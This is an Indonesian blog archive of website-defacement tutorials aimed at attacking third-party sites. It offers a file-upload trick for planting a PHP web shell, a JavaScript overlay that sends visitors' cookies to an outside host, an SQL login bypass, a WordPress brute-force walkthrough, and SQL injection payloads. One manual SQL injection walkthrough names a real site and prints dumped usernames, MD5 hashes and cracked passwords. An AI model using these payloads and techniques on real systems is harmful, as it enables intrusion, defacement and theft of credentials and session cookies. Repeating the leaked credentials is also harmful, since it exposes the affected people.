May 2017 - Defa Squad

Tempat Belajar Deface

Post Top Ad

Wednesday, May 31, 2017

Tutorial Deface : Tamper Data / Deface dengan upload iklan

May 31, 2017 0

Bahan-Bahan :

1. Duit ( Karena buat ngisiin ane pulsa :v )
2. Add-ons Tamper Data Di Mozilla 
   - tamper data 
   - icon redux 
download dua duanya
3. Shell backdoor . ubah shellnya jadi jpg atau png , caranya rename namashell.php.jpg ( tambahkan .jpg atau png di depan php ) kalau gak punya bisa kesini 
4. Script deface atau apalah terserah, gw kaga peduli lu mau pake apa, yang penting lu seneng 
tapi kalau lu gak punya bisa ke sini

Step by Step :

1. Seperti biasa dorking dlu aja di gugel ( inurl:/pasang-banner intext:"Banner tidak mengandung unsur SARA" )
kembangin lagi dorknya

2. Pilih aja web yg mau di eksekusi,,

3. Kalo udah dpt isi form daftarnya kek gambar ini

Deface Website Pasang Iklan (Tamper Data)

4. Di gambar atas ane udah buka tamper data,, buat yang belum tau caranya buka tamper data, tinggal pencet tombol "Alt nanti di atas browser mozilla kalian ada menu tools, lalu klik dan pilih tamper data"

5. Setelah tamper data di buka,, klik start tamper (kaya gambar di atas)

6. setelah klik start tamper lanjut klik pasang di form daftar nya !!! nanti akan muncul seperti ini..

Deface Website Pasang Iklan (Tamper Data)
Box continue Tampering nya di unceklis aja

7. Lalu klik tamperr,, ntar muncul tuh kode kode yg bikin males baca :v , kalian cari aja nama shellnya. Misalnya ane azzz.php.jpg nah lu hapus dah tuh .jpg nya jadi azzz.php, kalau udah klik ok aja 


8. Jika sukses akan muncul tulisan seperti ini..

Deface Website Pasang Iklan (Tamper Data)
9. Tinggal akses shell aja,, cnth : http://webiklan.crot/images/bnrs/namashellelu.php
kalo gak ada ya berarti webnya kaga vuln :v

Deface Website Pasang Iklan (Tamper Data)

Sumber : blog.garudasecurityhacker.org/2017/01/deface-website-pasang-iklan-tamper-data.html

tag : tutorial deface dengan tamper data , deface website dengan pasang iklan , deface dengan pasang banner , tutorial deface bypass extensi shell 
Read More

Tutorial Deface : Dengan Bypass Admin With JS Overlay

May 31, 2017 0


Dork :
inurl:/admin/index.php
inurl:/admin/login.php
inurl:/administrator/index.php
inurl/administrator/login.php
bisa kalian tambahkan intitle:admin / login site:.co.li

Oke Selanjutnya kita buat Catetan di pastebin , Buat JS Overlay nya

/*
<style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Pwnd Gasai47"
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="https://66.media.tumblr.com/ae95f10220dc9965b718b6966606d6cf/tumblr_n1yxvxZNgo1t014gho1_500.gif";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("You Lose , Zuhahahaha");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('You Lose , Zuhahahaha');
}
if(location.href.indexOf('transtv.co.id')==-1)setTimeout("alert('Yoshioka in Your Heart');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://sholihahlooks.com/sector.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="que3n4ngelz@yahoo.co.id";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:#000"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='http://sholihahlooks.com/sector.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}
kalian buat new paste , lalu paste kan script di atas
warna merah : buat alert
warna biru : link deface kalian / bekas / mirror , untuk menutupi halaman yang kita JS Overlay
nah kalo udah buat silahkan dorking

Nah kalo udah nemu target kita bypass , tidak semua web bisa

username : '=''or'
password : '=''or'


Kita Tambah Konten  / Kategori / apa yang bisa kita post di web tsb.

nah tadi udah buat pastebin kan ? nah di sini kita gunain :)

kalian klik raw di pastebin kalian

nah keluarnya gini , sekarang kita tambah java script :)
ex :
<script type="text/javascript" src="http://pastebin.com/raw/jnspgP0M"></script>

warna merah ganti link pastebin raw kalian :)


Jedooorrrr!!
demo < kalo udah di patch jgn salahin hehe





Tidak ada yang tidak mungkin selai kita belajar , mengembangkan , kreasi sendiri lebih baik
kacang tidak lupa kulit nya lebih indah :)


sumber : http://blog.garudasecurityhacker.org/2016/12/tutorial-deface-dengan-bypass-admin.html

tag : tutorial deface bypass admin , tutorial deface dengan ojs , cara deface bypass admin + ojs 
       Tutorial deface ojs ( open journal sytem )

Read More

Monday, May 29, 2017

Tutorial Deface : Brute Force Dengan Wpforce ( wordpress )

May 29, 2017 1
                                                                                 


Brute Force Attack adalah metode untuk meretas password (password cracking) dengan cara mencoba semua kemungkinan kombinasi yang ada pada “wordlist“

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

Download Wpbforce (wpforce ) versi 2 + wordlist > disini


Dork: inurl:/wp-login.php


googling dengan dork tadi dan cari target , ciri ciri target vunl masukkan kata admin di username loginnya dan tekan enter tampa mengisi paswordnya 
maka akan ada error pasword not found atau error pas lainnya 

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/


Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute


Lalu buka comand dengan cara : Klik Start>Run>ketik cmd



Biasanya posisi default directories di Cmd : C:\User\User_Name>


Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex: 
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd Wpforcev2 lalu tekan enter!  





Buka file dengan mengetik perintah: Wpforce.exe maka Akan muncul tampilan seperti gambar!






Lalu masukkan perintah: 
Wpforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10


Lalu tekan enter!
kalau gak bisa coba hilangkan -threads nya 


jadi kayak gini hasilnya : Wpforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt



Tunggu proses hingga selesai!


Wew! Berhasil tuh! wkwkwk Mantap! :p
Langsung Login dah!



GoodLuck!! :D 


ingat ya keberhasilan mendapatkan passwordnya itu tergantung dengan isi dari wordlist.txt

jadi kalau anda tidak mendapatkan paswordnya berarti wordlist kalian harus di tambah :)

Tag: Tutorial menggunakan wpforce , download wpforce v2 , download wpforce terbaru 2017 , tutorial deface wordpress , tutorial brute force , cara brute force , hacking wordpress , cara mendapatkan password login wordpress , wpbforce , Wpforcev2 , Wpbforcev2 , wpforce , tool deface 
Read More

Saturday, May 27, 2017

Script Deface : Script Anonymous

May 27, 2017 6


Demo Disini
Berminat ?
-  Downlaod Source Code Via Pastebin Disni
-  Download Langsung Jadi Via Media Fire Disini

dapatkan juga script deface lainnya disini

dan selesai sudah
makasihya sudah membaca artikel ini semoga bermanfaat :)
jangan lupa shere ya ke teman kalian


tag : 
script deface , download script deface , script deface update 2017 , defa squad , script deface anonymous , script deface html , script mendeface ,


Read More

Monday, May 22, 2017

Tool : Ofline Page admin finder

May 22, 2017 0
Admin Finder Login - family attack cyber
credit : blackbekasi

penampakannya :v



update url page login 2017
bisa di tambah lagi dengan cara menuliskan di admin.txt

silahkan download    >>>>  disini

dan dapatkan tool hacking dan deface lainnya di sini

tag : tool admin finder , admin finder offline , cara mencari tepat admin login , Tool deface ,
Read More

Tutorial Deface : Sql Lokomedia

May 22, 2017 2

Bahan :

1. Dork :

inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html

   Kembangin lagi biar dapet yg VULN + Perawan :p

2. Exploit

    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

   Gatau caranya? :v Sini gw ajarin :p

   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. Kalo vuln jadinya bakal kek gini.




5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

Untuk password masih berbentuk hash MD5, bisa kalian hash disini,

6. Tinggal cari admin page nya. Biasanya sih di:

http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

kalau gak dapat bisa pake tool admin finder download disini

cukup sampe sini ya tutorial saya , makasih dah baca post saya kali ini
jangan lupa shere ya :)


Tag : Sql lokomedia , belajar deface dengan teknik lokomedia ,
Read More

Tutorial Deface : Sql Injection Manual ( tampa tools )

May 22, 2017 1
Pengertian SQL Injection


SQLI atau Sqli injection adalah suatu teknik hacking yang di gunakan oleh penyerang/attacker untuk mendapatkan sebuah database dengan menyisipkan perintah - perintah SQL melalui url yang memanfaatkan bug yang disebabkan oleh kesalahan coding atau kurang pemfilteran variabel

Bagaimana cara mengetahui web tersebut vuln sqli?

Untuk mengetahui web tersebut vuln sqli atau terkena celah sqli adalah dengan cara membuat error url tersebut, dengan menambahkan karakter (') pada id di akhir url, 
contoh: target.com/index.php?id=sql'
            target.com/index.php?id=1'

Langsung saja ke tutorialnya.



Tutorial

Pertama-tama kita cari target dengan dork, anggap saja kalian udah pada mengerti, ini saya kasih contoh dork, kalian kembangin lagi sendiri.

inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=

Dan saya sudah punya target www.mywaymedia.it/readMore.php?id=15

Selanjutnya kita coba test web tersebut vuln atau tidak dengan menambahkan karakter (') , maka jadinya seperti ini www.mywaymedia.it/readMore.php?id=15'

Tutorial deface dengan SQLI manual
Dan ternyata error  

Notice: Use of undefined constant Errore - assumed 'Errore' in /var/www/www.mywaymedia.it/readMore.php on line 15 ErroreYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Untuk error website berbeda-beda

Berikut contoh-contoh error pada web yang terkena celah SQL Injection
  • You have an error in your SQL syntax;
  • Warning: mysql_fetch_array()
  • Warning: mysql_num_rows()
namu jika kalian masih kesusahan mencari web yang vunl sqli dengan dork di atas , coba menggunakan tool exploit scanner ( gr3enox ) disini untuk mencari web yang vunl

Dan masih banyak lagi, bukan hanya error aja, web blank atau ada data yg hilang itu juga tanda vuln,
Disini saya akan menggunakan add ons hakbar untuk mempermudah menginjeksinya, yang belum punya bisa pasang disini,
Kalau sudah untuk menampilkan hakbar tekan F9,
Lanjut menginjeksi
Sekarang kita akan mencari berapa jumlah column database site itu dengan menambahkan perintah order by, tambahkan + untuk spasi, jadi perintahnya seperti ini 
www.mywaymedia.it/readMore.php?id=15+order+by+1--

Lalu klik Execute Nanti web akan kembali normal, 
Tutorial deface dengan SQLI manual
lalu ganti angka 1 ke angka 2 dan seterusnya sampai ketemu error lagi agar lebih jelas lihat gambar dibawah
Disini saya menemukan errornya di order+by +5--
Tutorial deface dengan SQLI manual
Berati kita sudah menemukan jumlah column database 4, loh kok 4? sedangkan disitu errornya di 5,
Begini saya jelaskan, setelah kita memasukan perintah order by 1 sampe 4 tidak ada error dan errornya di angka 5 secara logika berati di column 5 tidak ada di database site tersebut, jadi column database cuma sampe 4 aja, kurang lebih begitu.
Lanjut.
Selanjutnya kita masukan perintah union select, ganti order by dengan +union+select+1,2,3,4-- dan sebelum angka di belakang url tersebut tambahkan tanda (-), maksud 1,2,3,4 itu adalah angka column tadi,
Maka perintahnya seperti berikut,
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,3,4--

maka nanti kita akan mendapatkan sebuah angka, disini saya mendaptkan angka 3 dan 4,
Tutorial deface dengan SQLI manual 
Kedua angka itu sebenarnya sama, kita pilih salah 1, saya memilih angka 3 untuk tahap selajutnya,
Sekarang kita lihat berapa version database site tersebut, ganti angka 3 di union select tadi dengan perintah @@version , maka perintahnya seperti berikut,
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,@@version,4--

Tutorial deface dengan SQLI manual

Nah kita tau version database tersebut 5.1.73 berati bisa kita lanjut, karena version 4 agak rumit, tapi rata-rata version 5 keatas,

Selanjutnya @@version kita ganti dengan perintah group_concat(table_name) dan di akhir angka sebelum tanda -- tadi masukan perintah from+information_schema.tables+where+table_schema=database()
Maka perintahnya seperti berikut.
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
Maka nanti kita akan mendapatkan nama-nama table di database tersebut

Tutorial deface dengan SQLI manual
Disini saya mendapatkan nama-nama table news,news_utf,tbl_users

Karena kita disini tujuanya deface berati kita mencari user dan password admin, berati kita cari table yang kemungkinan itu table admin, seperti admin dll,
disini saya mendapatkan table tbl_users 
Selanjutnya kita ganti group_concat(table_name) menjadi group_concat(column_name) dan from+information_schema.tables+where+table_schema= menjadi from+information_schema.columns+where+table_name= kemudian database() kita ganti dengan table tbl_users yang sudah kita rubah dengan decimal, mengubah decimal bisa mengunakan tools disini atau bisa langsung menggunakan hakbar.

kalau saya disini langsung menggunakan hakbar, caranya dengan cara klik SQL > MySQL > MySQL CHAR(), selanjutnya masukan nama table, maka akan jadi seperti berikut CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)
Maka perintahnya seperti berikut
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)--
Maka nanti kita akan mendapatkan nama-nama isi di table tbl_users,
Disini saya mendapatkan nama-nama table user_id,user_name,user_pass,user_lastaccess


Tutorial deface dengan SQLI manual

Disini sudah terlihat nama table user_name dan user_pass berati langkah selajutnya melihat datanya

Ganti group_concat(column_name) menjadi group_concat(user_name,0x3a,user_pass) untuk 0x3a itu decimal dari tanda (:)
Dan ganti from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115) menjadi from+tbl_users
Maka perintahnya seperti berikut
www.mywaymedia.it/readMore.php ?id=-15+union+select+1,2,group_concat(user_name,0x3a,user_pass),4+from+tbl_users--


Tutorial deface dengan SQLI manual

Dan kita sudah mendapatkan username dan password site tersebut
publishing@vivacom.com:67e84f9ebb0d4a3f782d61edc9a91528
myway:a17e60c21d70e8d576e4d1dfce3ba1f8 

User: publishing@vivacom.com
Password:  67e84f9ebb0d4a3f782d61edc9a91528
dan
User: myway
Password:  a17e60c21d70e8d576e4d1dfce3ba1f8

Untuk password masih berbentuk hash MD5, bisa kalian hash disini,

Tutorial deface dengan SQLI manual
Maka akan muncul password aslinya 

67e84f9ebb0d4a3f782d61edc9a91528 MD5 : 190773_v
a17e60c21d70e8d576e4d1dfce3ba1f8 MD5 : 12MMant


Maka hasilnya seperti berikut

User:  publishing@vivacom.com
Password: 190773_v
dan
User:  myway
Password:  12MMant

sumber: http://www.idiot-attacker.com/

sekarang tinggal cari tempat loginya , kalau ente kesusahan ane punya toolnya kok , klick disini 
Tag : tutorial deface sql injection , pengertian sql injection , belajar deface dengan sql injection tampa tool , apa itu sql , tutorial deface , sql ,cara sqli manual, tutorial sqli, tutorial sqli manual, tutorial hakbar, tutorial deface, sqli,
Read More

Saturday, May 20, 2017

Tutorial Deface : Dasar Mendeface

May 20, 2017 0



kali ini saya akan memposting dasar dasar sebelum mendeface

menurut saya sih :v 
sebelum mendeface anda harus belajar google dork dulu 

google dork ? 
ya google dork karna hampir semua tutorial hacking , jika ingin mencari target mesti menggunakan dork atau tool


Dibawah ini akan dijelaskan tentang perintah khusus pada Google ( google dork ), dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.

"Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yangdimaksud. Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.

“inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.


Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut. Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.


>“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.


“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google.

Sebagai contoh:

“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org


“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian :


“filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.


“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.


“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan. Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.


“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.

setelah mengetahui beberapa fungsi kata kunci di atas 

kalian perlu tau beberapa kata lain yang sering di gunakan saat mendeface

tebas index = adalah sebuah tindakan menganti tampilan utama suatu web
ya kalian pasti berpikir terus apa bedanya dengan pegertian deface

biasaya kalian liat tutorial deface yang hanya megupload file html , biasanya itu disebut dengan nitip file atau file upload.
meskipun itu masih di bilang dalam kategori mendeface tapi pada dasarnya gak ada tampilan dari suatu web yang anda ubah 

biasanya hacker mungupload shell backdor mereka untuk menebas index melalui file upload tampa harus mengetahui username dan pas web tersebut

ah jadi panjang lebar penjelasan gue :v
sory ya sampai di sini saja penjelasan gue 
maaf kalau ada kata yang kurang jelas dan terimakasih dan berkunjung kemari
jangan lupa shere ke teman anda ya :)

tag : dasar dasar mendeface , belajar google dork , cara membuat google dork , apa yang perlu di lakukan sebelum mendeface


Read More

Post Top Ad